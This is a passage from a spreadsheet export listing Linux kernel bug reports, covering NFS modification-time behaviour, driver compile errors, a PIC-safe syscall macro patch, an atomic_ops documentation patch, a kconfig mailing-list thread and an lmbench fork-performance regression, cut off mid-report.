    <t>Most recent kernel where this bug did not occur: 2.4.18 (maybe 2.4 in general) Distribution: any (Debian, SuSE, ...) Hardware Environment: any Software Environment: coreutils-5.92 to CVS HEAD. ====================================================================== Problem Description: While NFS apparently never claimed to be fully POSIX-compliant (fcntl and lockf) there seems to be a regression in one point with 2.6: NFS updates file modification time on close() which clashes with the way the standrd "cp" command is implemented in coreutils-5.92 and newer. Apparently, POSIX does not allow updating the modification time on close: http://lists.gnu.org/archive/html/bug-coreutils/2005-10/msg00221.html Quoting from there: &gt; &gt; POSIX is pretty careful in specifying when st_atime, st_mtime, and &gt; &gt; st_ctime can be changed (see, e.g., readdir()). POSIX doesn't grant &gt; &gt; permission for close() to change these times, so close() shouldn't &gt; &gt; change the times. This is independent of whether utimes() was called. According to http://lists.gnu.org/archive/html/bug-coreutils/2005-12/msg00219.html the usage pattern of the new cp from coreutils works fine with Linux-2.4.18 and an NFS Server as server. The problem of updating modification times on close (but apparently only if there were buffers to be written) causes trouble in "cp" because it updates the modification time of the file before it closes the file. This is perfectly legal according to POSIX and worked fine in the above test with Linux-2.4 The workaround for "cp" would be to call fsync() before updating the modification time, then close() does not update it again, and cp -p, -a and --preserve=timestamps work. The problem has been analzed in the Debiang bugtracker and http://bugs.donarmstrong.com/cgi-bin/bugreport.cgi?bug=340236 The end of it is also recorded in bug-coreutils: http://lists.gnu.org/archive/html/bug-coreutils/2005-12/msg00219.html The outcome there was that it would be a kernel problem. I don't know if it's possible to make NFS behave as it did in the test with 2.4.18 and Solaris as Server, but I'm filing this to make the problem researchable which look into this bugzilla for an answer and to hopefully get an answer too. ================================================================= Steps to reproduce: Simple local check using 2.6.16-rc4 with a local NFS server: mkdir /tmp/coreutils-test cd /tmp/coreutils-test wget http://ftp.gnu.org/pub/gnu/coreutils/coreutils-5.94.tar.bz2 tar xvfj coreutils-5.94.tar.bz2 cd coreutils-5.94 ./configure make mkdir -p test chown nobody test echo "$PWD/test 127.0.0.1(rw,sync)" &gt;&gt;/etc/exports # start/reload the kernel nfsserver now mkdir mountpoint mount localhost:/space/test $PWD/mountpoint # cat /proc/mounts shows me these mount options: # rw,v3,rsize=32768,wsize=32768,hard,lock,proto=tcp,addr=localhost cp -p configure configure.new ls -l configure configure.new # (modification time idential) src/cp -p configure mountpoint # (expect an error: failed to preserve ownerships / Operation not permitted) ls -l configure mountpoint/configure # (modification time differ, while the same cp command works locally) umount $PWD/mountpoint # stop nfsserver/remove exports entry and reload it. Summary: Either NFS needs to set the modification time on the last write (and never on close) or cp needs a workaround to call fsync() before calling utime().</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Distribution: Debian Testing Hardware Environment: x86 Software Environment: Linux razor 2.5.62bk4 #6 Fri Feb 21 11:47:01 EST 2003 i686 Pentium II (Klamath) GenuineIntel GNU/Linux Gnu C 2.95.4 Gnu make 3.79.1 util-linux 2.11n mount 2.11n module-init-tools implemented e2fsprogs 1.30-WIP reiserfsprogs 3.6.3 Linux C Library 2.2.5 Dynamic linker (ldd) 2.2.5 Procps 2.0.7 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 4.5.2 CONFIG_SOUND_GAMEPORT=y CONFIG_SOUND=y CONFIG_SOUND_PRIME=y CONFIG_SOUND_OSS=y CONFIG_SOUND_CS4232=y Problem Description: gcc -Wp,-MD,sound/oss/.cs4232.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict- prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe - mpreferred-stack-boundary=2 -march=i686 -Iinclude/asm-i386/mach-default - nostdinc -iwithprefix include -DKBUILD_BASENAME=cs4232 - DKBUILD_MODNAME=cs4232 -c -o sound/oss/cs4232.o sound/oss/cs4232.c sound/oss/cs4232.c:327: warning: `synthirq' defined but not used gcc -Wp,-MD,sound/oss/.ad1848.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict- prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe - mpreferred-stack-boundary=2 -march=i686 -Iinclude/asm-i386/mach-default - nostdinc -iwithprefix include -DKBUILD_BASENAME=ad1848 - DKBUILD_MODNAME=ad1848 -c -o sound/oss/ad1848.o sound/oss/ad1848.c sound/oss/ad1848.c: In function `activate_dev': sound/oss/ad1848.c:2990: too many arguments to function `pnp_activate_dev' sound/oss/ad1848.c: In function `ad1848_isapnp_init': sound/oss/ad1848.c:3027: structure has no member named `name' sound/oss/ad1848.c:3027: structure has no member named `name' sound/oss/ad1848.c: At top level: sound/oss/ad1848.c:2966: warning: `id_table' defined but not used make[2]: *** [sound/oss/ad1848.o] Error 1 make[1]: *** [sound/oss] Error 2 make: *** [sound] Error 2 Steps to reproduce: This problem was not present in 2.5.62-bk4. (I skipped from bk4 to bk7).</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.53 Distribution: Gentoo 1.4rc1 Hardware Environment: Abit KG7-RAID, AMD Athlon TBird 1.4, 512MB DDR, Geforce 3 Software Environment: gcc 3.2.1, glibc 2.3.1, ld 2.13.90.0.16 Problem Description: gcc -Wp,-MD,drivers/media/video/.zr36067.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach -numaq -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=zr36067 -DKBUILD_MO DNAME=zr36067 -c -o drivers/media/video/zr36067.o drivers/media/video/zr36067.c drivers/media/video/zr36067.c:66:27: linux/i2c-old.h: No such file or directory In file included from drivers/media/video/zr36067.c:75: drivers/media/video/zoran.h:226: field `i2c' has incomplete type drivers/media/video/zr36067.c: In function `i2c_setlines': drivers/media/video/zr36067.c:546: dereferencing pointer to incomplete type drivers/media/video/zr36067.c: In function `i2c_getdataline': drivers/media/video/zr36067.c:553: dereferencing pointer to incomplete type drivers/media/video/zr36067.c: In function `attach_inform': drivers/media/video/zr36067.c:560: dereferencing pointer to incomplete type drivers/media/video/zr36067.c:563: dereferencing pointer to incomplete type drivers/media/video/zr36067.c:564: dereferencing pointer to incomplete type drivers/media/video/zr36067.c:574: dereferencing pointer to incomplete type drivers/media/video/zr36067.c:579: dereferencing pointer to incomplete type drivers/media/video/zr36067.c: At top level: drivers/media/video/zr36067.c:593: variable `zoran_i2c_bus_template' has initializer but incomplete type drivers/media/video/zr36067.c:594: warning: excess elements in struct initializer drivers/media/video/zr36067.c:594: warning: (near initialization for `zoran_i2c_bus_template') drivers/media/video/zr36067.c:595: `I2C_BUSID_BT848' undeclared here (not in a function) drivers/media/video/zr36067.c:595: warning: excess elements in struct initializer drivers/media/video/zr36067.c:595: warning: (near initialization for `zoran_i2c_bus_template') drivers/media/video/zr36067.c:596: warning: excess elements in struct initializer drivers/media/video/zr36067.c:596: warning: (near initialization for `zoran_i2c_bus_template') drivers/media/video/zr36067.c:598: warning: excess elements in struct initializer drivers/media/video/zr36067.c:598: warning: (near initialization for `zoran_i2c_bus_template') drivers/media/video/zr36067.c:600: warning: excess elements in struct initializer drivers/media/video/zr36067.c:600: warning: (near initialization for `zoran_i2c_bus_template') drivers/media/video/zr36067.c:601: warning: excess elements in struct initializer drivers/media/video/zr36067.c:601: warning: (near initialization for `zoran_i2c_bus_template') drivers/media/video/zr36067.c:603: warning: excess elements in struct initializer drivers/media/video/zr36067.c:603: warning: (near initialization for `zoran_i2c_bus_template') drivers/media/video/zr36067.c:604: warning: excess elements in struct initializer drivers/media/video/zr36067.c:604: warning: (near initialization for `zoran_i2c_bus_template') drivers/media/video/zr36067.c:605: warning: excess elements in struct initializer drivers/media/video/zr36067.c:605: warning: (near initialization for `zoran_i2c_bus_template') drivers/media/video/zr36067.c:606: warning: excess elements in struct initializer drivers/media/video/zr36067.c:606: warning: (near initialization for `zoran_i2c_bus_template') drivers/media/video/zr36067.c: In function `zr36057_enable_jpg': drivers/media/video/zr36067.c:2325: warning: implicit declaration of function `i2c_control_device' drivers/media/video/zr36067.c:2325: `I2C_DRIVERID_VIDEODECODER' undeclared (first use in this function) drivers/media/video/zr36067.c:2325: (Each undeclared identifier is reported only once drivers/media/video/zr36067.c:2325: for each function it appears in.) drivers/media/video/zr36067.c:2327: `I2C_DRIVERID_VIDEOENCODER' undeclared (first use in this function) drivers/media/video/zr36067.c: In function `error_handler': drivers/media/video/zr36067.c:2764: `I2C_DRIVERID_VIDEODECODER' undeclared (first use in this function) drivers/media/video/zr36067.c: In function `zoran_open': drivers/media/video/zr36067.c:3267: structure has no member named `busy' drivers/media/video/zr36067.c: In function `zoran_close': drivers/media/video/zr36067.c:3316: `I2C_DRIVERID_VIDEODECODER' undeclared (first use in this function) drivers/media/video/zr36067.c:3319: `I2C_DRIVERID_VIDEOENCODER' undeclared (first use in this function) drivers/media/video/zr36067.c: In function `do_zoran_ioctl': drivers/media/video/zr36067.c:3526: `I2C_DRIVERID_VIDEODECODER' undeclared (first use in this function) drivers/media/video/zr36067.c:3533: `I2C_DRIVERID_VIDEOENCODER' undeclared (first use in this function) drivers/media/video/zr36067.c: At top level: drivers/media/video/zr36067.c:4404: unknown field `open' specified in initializer drivers/media/video/zr36067.c:4404: warning: initialization makes integer from pointer without a cast drivers/media/video/zr36067.c:4405: unknown field `close' specified in initializer drivers/media/video/zr36067.c:4405: warning: initialization from incompatible pointer type drivers/media/video/zr36067.c:4406: unknown field `read' specified in initializer drivers/media/video/zr36067.c:4407: unknown field `write' specified in initializer drivers/media/video/zr36067.c:4407: warning: initialization makes integer from pointer without a cast drivers/media/video/zr36067.c:4408: unknown field `ioctl' specified in initializer drivers/media/video/zr36067.c:4408: warning: missing braces around initializer drivers/media/video/zr36067.c:4408: warning: (near initialization for `zoran_template.lock') drivers/media/video/zr36067.c:4408: warning: initialization makes integer from pointer without a cast drivers/media/video/zr36067.c:4409: unknown field `mmap' specified in initializer drivers/media/video/zr36067.c:4409: warning: initialization from incompatible pointer type drivers/media/video/zr36067.c:4410: unknown field `initialize' specified in initializer drivers/media/video/zr36067.c:4410: warning: excess elements in struct initializer drivers/media/video/zr36067.c:4410: warning: (near initialization for `zoran_template') drivers/media/video/zr36067.c: In function `zr36057_init': drivers/media/video/zr36067.c:4551: warning: implicit declaration of function `i2c_unregister_bus' drivers/media/video/zr36067.c:4564: `I2C_DRIVERID_VIDEODECODER' undeclared (first use in this function) drivers/media/video/zr36067.c:4568: `I2C_DRIVERID_VIDEOENCODER' undeclared (first use in this function) drivers/media/video/zr36067.c: In function `release_dc10': drivers/media/video/zr36067.c:4631: warning: implicit declaration of function `free_irq' drivers/media/video/zr36067.c: In function `find_zr36057': drivers/media/video/zr36067.c:4702: warning: implicit declaration of function `request_irq' drivers/media/video/zr36067.c:4743: sizeof applied to an incomplete type drivers/media/video/zr36067.c:4743: sizeof applied to an incomplete type drivers/media/video/zr36067.c:4743: sizeof applied to an incomplete type drivers/media/video/zr36067.c:4747: warning: implicit declaration of function `i2c_register_bus' include/linux/ctype.h: At top level: drivers/media/video/zr36067.c:593: storage size of `zoran_i2c_bus_template' isn't known drivers/media/video/zr36067.c:247: warning: `zr36067_pci_tbl' defined but not used make[3]: *** [drivers/media/video/zr36067.o] Error 1 make[2]: *** [drivers/media/video] Error 2 make[1]: *** [drivers/media] Error 2 make: *** [drivers] Error 2 Steps to reproduce: Multimedia devices ---&gt; Video For Linux ---&gt; &lt;*&gt; Zoran ZR36057/36060 Video For Linux CONFIG_VIDEO_ZORAN=y</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: n/a Distribution: n/a Hardware Environment: n/a Software Environment: gcc/g++ with -fpic or -fPIC commandline option Problem Description: gcc reserves %ebx when generating position-independent-code. The _syscallX() macros in include/asm-i386/unistd.h fail to preserve this register and are thus uncompilable in PIC mode. Steps to reproduce: Compile the following program with "gcc -fpic" #include &lt;stdio.h&gt; #include &lt;asm/unistd.h&gt; #include &lt;errno.h&gt; #include &lt;unistd.h&gt; #define __NR_my_write __NR_write static inline _syscall3(ssize_t, my_write, int, fd, const void *, buf, size_t, count); int main() { #ifdef __PIC__ const char s[] = "PIC is defined\n"; #else const char s[] = "PIC is undefined\n"; #endif my_write(1, s, sizeof(s)); return 0; } Bug fix: --- linux/include/asm-i386/unistd.h.orig 2006-03-05 11:07:54.000000000 -0800 +++ linux/include/asm-i386/unistd.h 2006-03-09 14:25:45.000000000 -0800 @@ -326,6 +326,7 @@ __syscall_return(type,__res); \ } +#ifndef __PIC__ #define _syscall1(type,name,type1,arg1) \ type name(type1 arg1) \ { \ @@ -393,6 +394,82 @@ __syscall_return(type,__res); \ } +#else /* __PIC__ */ + +#define _syscall1(type,name,type1,arg1) \ +type name(type1 arg1) \ +{ \ +long __res; \ +__asm__ volatile ("push %%ebx ; movl %2,%%ebx ; int $0x80 ; pop %%ebx" \ + : "=a" (__res) \ + : "0" (__NR_##name),"ri" ((long)(arg1)) : "memory"); \ +__syscall_return(type,__res); \ +} + +#define _syscall2(type,name,type1,arg1,type2,arg2) \ +type name(type1 arg1,type2 arg2) \ +{ \ +long __res; \ +__asm__ volatile ("push %%ebx ; movl %2,%%ebx ; int $0x80 ; pop %%ebx" \ + : "=a" (__res) \ + : "0" (__NR_##name),"ri" ((long)(arg1)),"c" ((long)(arg2)) \ + : "memory"); \ +__syscall_return(type,__res); \ +} + +#define _syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \ +type name(type1 arg1,type2 arg2,type3 arg3) \ +{ \ +long __res; \ +__asm__ volatile ("push %%ebx ; movl %2,%%ebx ; int $0x80 ; pop %%ebx" \ + : "=a" (__res) \ + : "0" (__NR_##name),"ri" ((long)(arg1)),"c" ((long)(arg2)), \ + "d" ((long)(arg3)) : "memory"); \ +__syscall_return(type,__res); \ +} + +#define _syscall4(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4) \ +type name (type1 arg1, type2 arg2, type3 arg3, type4 arg4) \ +{ \ +long __res; \ +__asm__ volatile ("push %%ebx ; movl %2,%%ebx ; int $0x80 ; pop %%ebx" \ + : "=a" (__res) \ + : "0" (__NR_##name),"ri" ((long)(arg1)),"c" ((long)(arg2)), \ + "d" ((long)(arg3)),"S" ((long)(arg4)) : "memory"); \ +__syscall_return(type,__res); \ +} + +#define _syscall5(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \ + type5,arg5) \ +type name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5) \ +{ \ +long __res; \ +__asm__ volatile ("push %%ebx ; movl %2,%%ebx ; movl %1,%%eax ; " \ + "int $0x80 ; pop %%ebx" \ + : "=a" (__res) \ + : "i" (__NR_##name),"ri" ((long)(arg1)),"c" ((long)(arg2)), \ + "d" ((long)(arg3)),"S" ((long)(arg4)),"D" ((long)(arg5)) \ + : "memory"); \ +__syscall_return(type,__res); \ +} + +#define _syscall6(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \ + type5,arg5,type6,arg6) \ +type name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5,type6 arg6) \ +{ \ +long __res; \ + struct { long __a1; long __a6; } __s = { (long)arg1, (long)arg6 }; \ +__asm__ volatile ("push %%ebp ; push %%ebx ; movl 4(%2),%%ebp ; " \ + "movl 0(%2),%%ebx ; movl %1,%%eax ; int $0x80 ; " \ + "pop %%ebx ; pop %%ebp" \ + : "=a" (__res) \ + : "i" (__NR_##name),"0" ((long)(&amp;__s)),"c" ((long)(arg2)), \ + "d" ((long)(arg3)),"S" ((long)(arg4)),"D" ((long)(arg5)) \ + : "memory"); \ +__syscall_return(type,__res); \ +} +#endif /* __PIC__ */ + #ifdef __KERNEL__ #define __ARCH_WANT_IPC_PARSE_VERSION #define __ARCH_WANT_OLD_READDIR</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unknown Problem Description: atomic_ops.txt has incorrect, misleading and insufficient information about semantics. Signed-off-by: Matti Linnanvuori &lt;mattilinnanvuori@yahoo.com&gt; --- 2.6.23-rc6/Documentation/atomic_ops.txt 2007-09-14 23:49:20.126251500 +0300 +++ 2.6.23/Documentation/atomic_ops.txt 2007-09-15 00:13:52.259568000 +0300 @@ -24,6 +24,10 @@ The first macro is used in definitions, static atomic_t my_counter = ATOMIC_INIT(1); +The initializer is atomic in that the return values of the atomic +operations are guaranteed to be correct with respect to the value +initialized if the interface is used correctly. + The second interface can be used at runtime, as in: struct foo { atomic_t counter; }; @@ -36,13 +40,24 @@ The second interface can be used at runt return -ENOMEM; atomic_set(&amp;k-&gt;counter, 0); +The setting is atomic in that the return values of the atomic +operations are guaranteed to be correct with respect to the value set +if the interface is used correctly. + Next, we have: #define atomic_read(v) ((v)-&gt;counter) -which simply reads the current value of the counter. +which simply reads the counter value currently visible to the calling +thread. The read is atomic in that the return value is guaranteed to +be one of the values initialized or modified with the interface if +the interface is used correctly. atomic_read does not guarantee that +the runtime initialization by any other thread is visible yet, so the +user of the interface must take care of that with an implicit or +explicit memory barrier. -Now, we move onto the actual atomic operation interfaces. +Now, we move onto the atomic operation interfaces typically +implemented with the help of assembly code. void atomic_add(int i, atomic_t *v); void atomic_sub(int i, atomic_t *v);</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Distribution: Gentoo Linux Hardware Environment: IBM ThinkPad X31 Software Environment: Linux sponge 2.6.8.1 #7 Wed Aug 25 22:37:20 CEST 2004 i686 Intel(R) Pentium(R) M processor 1300MHz GenuineIntel GNU/Linux Gnu C 3.3.3 Gnu make 3.80 binutils 2.14.90.0.8 util-linux 2.12 mount 2.12 module-init-tools 3.0 e2fsprogs 1.35 pcmcia-cs 3.2.5 PPP 2.4.1 nfs-utils 1.0.6 Linux C Library 2.3.3 Dynamic linker (ldd) 2.3.3 Procps 3.1.15 Net-tools 1.60 Kbd 1.12 Sh-utils 5.2.1 Modules Loaded arc4 ieee80211_crypt_wep crc32 usbhid eth1394 ds ipw2100 firmware_class ieee80211 ieee80211_crypt ohci1394 ieee1394 yenta_socket pcmcia_core snd_intel8x0m snd_intel8x0 snd_ac97_codec snd_mpu401_uart snd_rawmidi snd_pcm_oss snd_pcm snd_page_alloc snd_timer snd_mixer_oss snd soundcore ibm_acpi Problem Description: The following files, perhaps more, should #include &lt;linux/netfilter_ipv4.h&gt; or symbols like NF_IP_PRE_ROUTING will be unknown. net/ipv4/netfilter/ip_conntrack_proto_tcp.c net/ipv4/netfilter/ip_conntrack_proto_udp.c net/ipv4/netfilter/ip_conntrack_proto_icmp.c Steps to reproduce: Enable netfilter connection tracking and compile.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Sony PCV-RX550 lspci -nv: (snipped) 0000:00:00.0 Class 0600: 8086:1a30 (rev 03) Subsystem: 1043:8025 Flags: bus master, fast devsel, latency 0 Memory at f8000000 (32-bit, prefetchable) Capabilities: [e4] #09 [0104] Capabilities: [a0] AGP version 2.0 lspci -v: (snipped) 0000:00:00.0 Host bridge: Intel Corporation 82845 845 (Brookdale) Chipset Host Bridge (rev 03) Subsystem: ASUSTeK Computer Inc.: Unknown device 8025 Flags: bus master, fast devsel, latency 0 Memory at f8000000 (32-bit, prefetchable) Capabilities: [e4] #09 [0104] Capabilities: [a0] AGP version 2.0 lspci: 0000:00:00.0 Host bridge: Intel Corporation 82845 845 (Brookdale) Chipset Host Bridge (rev 03) 0000:00:01.0 PCI bridge: Intel Corporation 82845 845 (Brookdale) Chipset AGP Bridge (rev 03) 0000:00:1e.0 PCI bridge: Intel Corporation 82801 PCI Bridge (rev 12) 0000:00:1f.0 ISA bridge: Intel Corporation 82801BA ISA Bridge (LPC) (rev 12) 0000:00:1f.1 IDE interface: Intel Corporation 82801BA IDE U100 (rev 12) 0000:00:1f.2 USB Controller: Intel Corporation 82801BA/BAM USB (Hub #1) (rev 12) 0000:00:1f.4 USB Controller: Intel Corporation 82801BA/BAM USB (Hub #2) (rev 12) 0000:00:1f.5 Multimedia audio controller: Intel Corporation 82801BA/BAM AC'97 Audio (rev 12) 0000:01:00.0 VGA compatible controller: nVidia Corporation NV5M64 [RIVA TNT2 Model 64/Model 64 Pro] (rev 15) 0000:02:0b.0 Communication controller: Agere Systems (former Lucent Microelectronics) LT WinModem (rev 02) 0000:02:0d.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) 0000:02:0e.0 FireWire (IEEE 1394): Texas Instruments TSB12LV26 IEEE-1394 Controller (Link) Software Environment: Gentoo Linux, 2005.0 Problem Description: See http://www2.lm-sensors.nu/~lm78/cvs/browse.cgi/lm_sensors2/prog/hotplug/README.p4b or prog/hotplug/README.p4b iin the lm_sensors package Steps to reproduce: N/A I've created a patch that seems to fix the problem, by adding my motherbaord to the quirks list.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Description of problem: Description of power_save parameter of iwlwifi module gave by modinfo is different from its definition in iwl-modparams.h Version-Release number of selected component (if applicable): kernel 3.14.6 From modinfo: power_save:enable WiFi power management (default: disable) TRUE =&gt; enable power management From iwl-modparams.h * @power_save: disable power save, default = false TRUE =&gt; disable power management</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Distribution:redhat Hardware Environment: 164LX Software Environment: rawhide Problem Description: failure to compile. when converting structure name the author missed one. Steps to reproduce: compile Patch: *** a/arch/alpha/kernel/signal.c.old 2003-02-10 22:55:08.000000000 -0800 --- b/arch/alpha/kernel/signal.c 2003-02-10 22:55:17.000000000 -0800 *************** *** 623,629 **** if (signr &gt; 0) { /* Whee! Actually deliver the signal. */ ! struct k_sigaction *ka = &amp;current-&gt;sig-&gt;action[signr-1]; if (r0) syscall_restart(r0, r19, regs, ka); handle_signal(signr, ka, &amp;info, oldset, regs, sw); --- 623,629 ---- if (signr &gt; 0) { /* Whee! Actually deliver the signal. */ ! struct k_sigaction *ka = &amp;current-&gt;sighand-&gt;action[signr-1]; if (r0) syscall_restart(r0, r19, regs, ka); handle_signal(signr, ka, &amp;info, oldset, regs, sw);</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CLASS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM/ARB SUBCLASS</t>
  </si>
  <si>
    <t>kernel version integrated</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>&lt;-- snip --&gt; Date: Thu, 21 Nov 2002 09:39:12 +0100 From: Adrian Bunk &lt;bunk@fs.tum.de&gt; To: Roman Zippel &lt;zippel@linux-m68k.org&gt; Cc: linux-kernel@vger.kernel.org Subject: 2.5 kconfig doesn't handle "&amp;&amp; m" correctly Hi Roman, while looking for the reason for a compile error in 2.5.48 I noticed the following that seems to be a bug in the new kconfig: The following is with a .config that was generated using "make oldconfig": &lt;-- snip --&gt; $ grep SOUND_WAVEFRONT .config CONFIG_SOUND_WAVEFRONT=y $ &lt;-- snip --&gt; sound/oss/Kconfig contains the following: &lt;-- snip --&gt; ... config SOUND_WAVEFRONT tristate "Full support for Turtle Beach WaveFront (Tropez Plus, Tropez, +Maui) synth/soundcards" depends on SOUND_OSS &amp;&amp; m ... &lt;-- snip --&gt; It seems the "&amp;&amp; m" (a common way to ensure that something can only be built modular) isn't handled correctly. cu Adrian &lt;-- snip --&gt; Date: Thu, 21 Nov 2002 13:57:30 +0100 (CET) From: Roman Zippel &lt;zippel@linux-m68k.org&gt; To: Adrian Bunk &lt;bunk@fs.tum.de&gt; cc: linux-kernel@vger.kernel.org Subject: Re: 2.5 kconfig doesn't handle "&amp;&amp; m" correctly Hi, On Thu, 21 Nov 2002, Adrian Bunk wrote: &gt; config SOUND_WAVEFRONT &gt; tristate "Full support for Turtle Beach WaveFront (Tropez Plus, Tropez, +Maui) synth/soundcards" &gt; depends on SOUND_OSS &amp;&amp; m &gt; ... &gt; &gt; &lt;-- snip --&gt; &gt; &gt; &gt; It seems the "&amp;&amp; m" (a common way to ensure that something can only be &gt; built modular) isn't handled correctly. Did you disable modules? When modules are disabled tristate symbols are treated like booleans, that means they are visible if the dependencies are different than 'n'. For this it should be possible to automatically add '&amp;&amp; MODULES' if the parser sees a 'm'. I'll have to check this out. bye, Roman &lt;-- snip --&gt; Date: Thu, 21 Nov 2002 14:24:59 +0100 From: Adrian Bunk &lt;bunk@fs.tum.de&gt; To: Roman Zippel &lt;zippel@linux-m68k.org&gt; Cc: linux-kernel@vger.kernel.org Subject: Re: 2.5 kconfig doesn't handle "&amp;&amp; m" correctly On Thu, Nov 21, 2002 at 01:57:30PM +0100, Roman Zippel wrote: &gt; Hi, Hi Roman, &gt; On Thu, 21 Nov 2002, Adrian Bunk wrote: &gt; &gt; &gt; config SOUND_WAVEFRONT &gt; &gt; tristate "Full support for Turtle Beach WaveFront (Tropez Plus, Tropez, +Maui) synth/soundcards" &gt; &gt; depends on SOUND_OSS &amp;&amp; m &gt; &gt; ... &gt; &gt; &gt; &gt; &lt;-- snip --&gt; &gt; &gt; &gt; &gt; &gt; &gt; It seems the "&amp;&amp; m" (a common way to ensure that something can only be &gt; &gt; built modular) isn't handled correctly. &gt; &gt; Did you disable modules? When modules are disabled tristate symbols are yes, this was with a .config without modules support. ... &lt;-- snip --&gt; This problem is still present in 2.5.56. This problem generate nasty problems when drivers that are not designed to be compiled into the kernel get compiled into the kernel because of this bug.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Software Environment: See #603 Problem Description: Compiling CONFIG_SOFTWARE_SUSPEND without CONFIG_SWAP set leads to: gcc -Wp,-MD,kernel/.suspend.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototyp es -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-b oundary=2 -march=pentium3 -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=suspend -DKBUILD_MODNAME=suspend -c -o kernel/susp end.o kernel/suspend.c kernel/suspend.c: In function `freeze_processes': kernel/suspend.c:228: warning: comparison of distinct pointer types lacks a cast kernel/suspend.c:293:2: warning: #warning This might be broken. We need to someh ow wait for data to reach the disk kernel/suspend.c: In function `mark_swapfiles': kernel/suspend.c:321: warning: implicit declaration of function `rw_swap_page_sy nc' kernel/suspend.c: In function `read_swapfiles': kernel/suspend.c:350: warning: implicit declaration of function `swap_list_lock' kernel/suspend.c:352: `swap_info' undeclared (first use in this function) kernel/suspend.c:352: (Each undeclared identifier is reported only once kernel/suspend.c:352: for each function it appears in.) kernel/suspend.c:377: warning: implicit declaration of function `swap_list_unloc k' kernel/suspend.c: In function `lock_swapdevices': kernel/suspend.c:388: `swap_info' undeclared (first use in this function) make[2]: *** [kernel/suspend.o] Error 1 make[1]: *** [kernel] Error 2 make[1]: Leaving directory `/usr/src/linux-2.5.67' make: *** [stamp-build] Error 2 I'm not sure whether CONFIG_SOFTWARE_SUSPEND should simply not be displayed if CONFIG_SWAP is not set or whether CONFIG_SOFTWARE_SUSPEND should mention CONFIG_SWAP requirement... Whatever should be done, it shouldn't fail with such a compile error...</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Distribution: Hardware Environment:IBM 8500R 8-way 700 MHz 4 GB RAM Software Environment:Stock kernel 2.4.20 and 2.5.63 Problem Description:The time for fork+/bin/sh in 2.5.63 is slower than 2.4.20 Steps to reproduce: 1. run lmbench 2. analyze the data on the test process fork+/bin/sh - 3. see the attached data Actual Results: All times are in microseconds 2.4.20 2.5.63 ====== ====== Process fork+exit 416.7143 315.1667 Process fork+execve 1080.2 1138. Process fork+/bin/sh -c 4736. 4939.5 Expected Results: The process fork+exit is faster on 2.5, so it is expected that fork+execve and fork+/bin/sh -c is as fast or faster in 2.5 compared to 2.4 Additional Information: ------- Additional Comment #1 From Duc J. Vianney 2003-04-17 11:42 ------- The following are some additional comments on the subject. Of particular interest is the performance difference between P4 and P3, and the possible cause of the problem on high memory and rmap. Duc Vianney. ============================================================================== -------- Original Message -------- Subject: Re: Minutes from Feb 21 LSE Call Date: Tue, 25 Feb 2003 19:20:17 +0000 (UTC) From: torvalds@transmeta.com (Linus Torvalds) Organization: Transmeta Corporation To: linux-kernel@vger.kernel.org Newsgroups: mailinglists.external.linux-kernel References: &lt;mbligh@aracnet.com&gt; &lt;200302251711.h1PHBct16624@mail.osdl.org&gt; In article &lt;200302251711.h1PHBct16624@mail.osdl.org&gt;, Cliff White wrote: &gt; &gt;Well, here's one bit of data. Easy enough to do if you have a web browser. &gt;LMBench 2.0 on 1-way and 2-way, kernels 2.4.18 and 2.5.60 &gt;1-way (stp1-003 stp1-002) &gt;2.4.18 http://khack.osdl.org/stp/7443/&gt;2.5.60 http://khack.osdl.org/stp/265622/ &gt; &gt;2-way (stp2-003 stp2-000) &gt;2.4.18 http://khack.osdl.org/stp/3165/&gt;2.5.60 http://khack.osdl.org/stp/265643/&gt; &gt;Interesting items for me are the fork/exec/sh times and some of the file + VM &gt;numbers &gt;LMBench 2.0 Data ( items selected from total of five runs ) &gt; &gt;Processor, Processes - times in 